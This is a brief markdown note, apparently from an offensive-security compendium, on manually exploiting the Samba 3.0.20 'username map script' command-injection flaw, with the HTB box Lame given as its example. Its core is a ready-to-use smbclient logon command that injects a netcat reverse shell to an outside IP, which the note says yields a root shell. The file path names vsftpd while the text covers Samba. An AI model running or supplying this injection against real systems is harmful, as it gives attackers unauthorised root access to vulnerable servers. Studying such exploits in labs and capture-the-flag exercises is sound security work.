killchain-compendium/Exploits/SMB/vsftpd_234_backdoor.md

SMB Exploits

usermap_script.rb

There can be a need to do manual exploitation for Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) like the HTB box Lame shows. Since the automated exploit does not work, log in anonymously without an account and do the following

smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"

A connection to the root shell is provided.